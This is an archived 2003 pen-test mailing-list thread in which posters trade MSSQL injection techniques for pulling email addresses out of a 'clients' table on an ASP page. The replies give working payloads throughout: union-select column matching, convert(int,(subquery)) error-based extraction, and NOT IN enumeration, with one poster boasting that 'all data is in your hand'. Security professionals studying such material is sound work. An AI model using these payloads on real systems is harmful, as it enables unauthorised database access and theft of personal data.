Hello dude, You cant use "union" or "having" when the original query looks like "select * from table" or "select image from table", but this disadvantage can be bypass easily when using convert(int,(your injected query)). Just put an " ' and convert(int,(injected query)), all data is in your hand :D. On Thursday 13 February 2003 01:51 am, Panos Dimitriou wrote: > One solution is to try to find the exact columns to perform a union > select by replacing 1s with 'foo' when you get the error message " > operand type clash: text is incompatible with int" > > Example: > > ') union all select sum(email),1,1,1.... from clients-- > until you get: operand type clash: text is incompatible with int Then > change the last 1 with 'foo' and continue with 1s, and so on and so > forth. > > The other solution is to try to get all the data through error cycling, > as you already tried and use NOT IN as follows: > > ' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in > ('anonat_private','othermailat_private',...))) %2b ' > > I hope this works > > Panos Dimitriou > Director, MSS > > > -----Original Message----- > From: Daniel Savi [mailto:dssat_private] > Sent: Wednesday, February 12, 2003 7:49 PM > To: pen-testat_private > Subject: SQL injection - get more values > > > > Hi :) > > i'm trying to get some info from clients table and email field.... > > i try this param into gubpage.asp?=... > ') union select sum(email) from clients-- > and got error about all queries needed...so, i tryed to solve with > ') union select sum(email),1,1,1.... from clients-- > until i get: operand type clash: text is incompatible with int > > i found this answer into this forum (thanks :)), was: > ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b ' > > i got this: > Syntax error converting the varchar value 'anonat_private' to a column of > data type int > > Now, my problem: How can i get other e-mail from table knowing one valid > > value? > > i try this > ' %2b convert(int, (SELECT email FROM clients WHERE email > > > 'anonat_private')) %2b ' > > but no success > > i think i can use NOT iN, but not sure how to use with convert... > > Any tip are welcome! > > Thanks > > ------------------------------------------------------------------------ > ---- > This list is provided by the SecurityFocus Security Intelligence Alert > (SIA) > Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security vulnerabilities please > see: > https://alerts.securityfocus.com/ > > > --------------------------------------------------------------------------- >- This list is provided by the SecurityFocus Security Intelligence Alert > (SIA) Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security vulnerabilities please see: > https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Feb 13 2003 - 07:05:57 PST